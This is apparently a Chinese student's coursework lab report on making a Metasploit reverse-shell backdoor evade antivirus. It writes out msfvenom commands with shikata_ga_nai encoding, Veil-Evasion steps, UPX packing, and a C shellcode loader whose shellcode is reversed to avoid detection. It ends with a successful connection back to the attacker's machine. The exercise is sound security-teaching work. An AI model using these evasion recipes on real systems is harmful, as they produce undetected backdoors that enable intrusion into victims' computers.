20155305《网络对抗》免杀原理与实践

20155305《网络对抗》免杀原理与实践

实验主要过程

1、免杀效果参考基准

• Kali使用上次实验msfvenom产生后门的可执行文件，刚刚传送到Win主机就被电脑管家查杀了恢复后这次放入老师提供的网址http://www.virscan.org/进行扫描，有48%的杀软报告病毒。

2、使用msf编码器

• 编码一次
  Kali输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5305端口号 -f exe >自己起后门名字.exe

理论上会降低被查出率，但因为老师说由于使用的这个编码平台太著名了，很容易被杀软盯上，所以实际上并没有什么变化。网站监测结果是51%的杀软报告病毒，还不如不编码呢（高了两个百分点）。

回连成功

• 多次编码
  Kali输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=kali的IP LPORT=5305端口号 -f exe > 自己起后门名字.exe

多次编码依旧没有任何作用，被电脑管家查杀，恢复后放入网站检查

尝试回连，录音功能成功

3、使用Veil-Evasion重新编写源代码

• 在Kali中安装veil，sudo apt-get install veil，这其中有paython的安装可能有些电脑没有wine32，所以需要安装apt-get install wine32

• 在Kali的终端中启动Veil-Evasion
  命令行中输入veil，后在veil中输入命令use evasion
  依次输入如下命令生成你的可执行文件：

use python/meterpreter/rev_tcp.py（设置payload）

set LHOST Kali的IP（设置反弹连接IP）

set LPORT 端口号（设置反弹端口）

generate
可执行文件名

选择使用语言来编写

根据生成路径找到生成的可执行文件，放到网上进行检测，有20%的杀软报告病毒，这个异常难安装的veil加python终于降低了被查杀率，还是有些效果的。
尝试回连，拍照功能成功

4、UPX加壳尝试

命令upx 5305.exe -o 5305-2.exe

upx加壳后的5305-2.exe看着很牛皮，但是被电脑管家妥妥查杀了。。。

再在网站扫描一下，百分之48的惊人数据说明upx加壳没什么用啊

5、C语言调用Shellcode

• 首先，在Kali上使用命令生成一个c语言格式的Shellcode数组。

• VS编译运行产生exe文件（exe文件名不能存在20155305这样的学号因为网站检测时会说有明显广告语。。）

• 只有百分之十二的杀软报告发现病毒，免杀效果非常可观，重点是我的腾讯管家没有弹出警告，有点遗憾，但有觉得免杀学会了之后确实有点厉害哦

• 优化

上面的结果已经不错了，但是还可以更好，比如逆序修改Shellcode数组，然后再用它替换上面的c文件里原本的Shellcode数组。编译运行后结果有了很大提升，电脑管家没有查杀出来，优化前后均可实现杀软共生

6、实测优化版本、回连成功

按照上次实验用过的msf监听方法在Kali上打开监听，在Win主机开启杀软（Win安装腾讯电脑管家 ）的情况下，运行最后生成的优化版exe文件，Kali成功获取了Win主机的权限